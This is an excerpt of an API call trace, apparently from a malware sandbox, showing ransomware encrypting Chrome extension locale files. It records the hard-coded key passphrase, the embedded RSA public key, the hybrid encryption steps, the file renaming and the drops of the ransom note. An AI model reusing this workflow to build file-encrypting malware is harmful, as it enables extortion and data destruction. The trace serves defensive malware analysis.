"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.fuck")) returned 1 [0260.552] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.552] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.552] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.552] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.552] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.552] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0260.552] AreFileApisANSI () returned 1 [0260.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.552] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.553] GetFileType (hFile=0x5d60) returned 0x1 [0260.553] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.554] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.554] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.556] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.556] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.556] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.556] GetLastError () returned 0x0 [0260.556] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json")) returned 0x20 [0260.556] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0260.557] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.558] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.559] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.561] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.563] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.563] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.563] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.563] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.563] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.563] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.563] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f6c0) returned 1 [0260.563] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f6c0, dwCertEncodingType=0x1, pInfo=0x2eb27d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2800*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2808*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d600) returned 1 [0260.563] CryptEncrypt (in: hKey=0x2e7d600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.564] CryptEncrypt (in: hKey=0x2e7d600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70d98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70d98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.564] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e70d98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70d98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.565] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x108, lpOverlapped=0x0) returned 1 [0260.566] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x108, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.566] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.566] CloseHandle (hObject=0x5d5c) returned 1 [0260.566] CloseHandle (hObject=0x5d64) returned 1 [0260.566] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0260.569] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0260.569] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0260.571] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0260.572] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.572] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.572] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.572] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.572] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.572] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0260.572] AreFileApisANSI () returned 1 [0260.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.572] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.573] GetFileType (hFile=0x5d60) returned 0x1 [0260.573] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.575] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.575] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.575] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.575] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.575] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.575] GetLastError () returned 0x0 [0260.575] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0260.576] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0260.577] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.577] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.578] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.578] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.580] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.580] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.580] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.580] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.580] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.581] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.581] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e708d0) returned 1 [0260.581] CryptImportPublicKeyInfo (in: hCryptProv=0x2e708d0, dwCertEncodingType=0x1, pInfo=0x2eb2970*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb29a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb29a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d300) returned 1 [0260.581] CryptEncrypt (in: hKey=0x2e7d300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.581] CryptEncrypt (in: hKey=0x2e7d300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71260*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e71260*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.581] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e71260*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e71260*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.582] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xde, lpOverlapped=0x0) returned 1 [0260.583] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xde, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0260.583] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0260.584] CloseHandle (hObject=0x5d64) returned 1 [0260.584] CloseHandle (hObject=0x5d5c) returned 1 [0260.584] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0260.588] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0260.588] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0260.589] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0260.591] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.591] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.591] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.591] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.591] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.591] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0260.591] AreFileApisANSI () returned 1 [0260.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0260.592] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.592] GetFileType (hFile=0x5d60) returned 0x1 [0260.593] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.594] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.594] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.594] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.594] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.595] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.595] GetLastError () returned 0x0 [0260.595] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 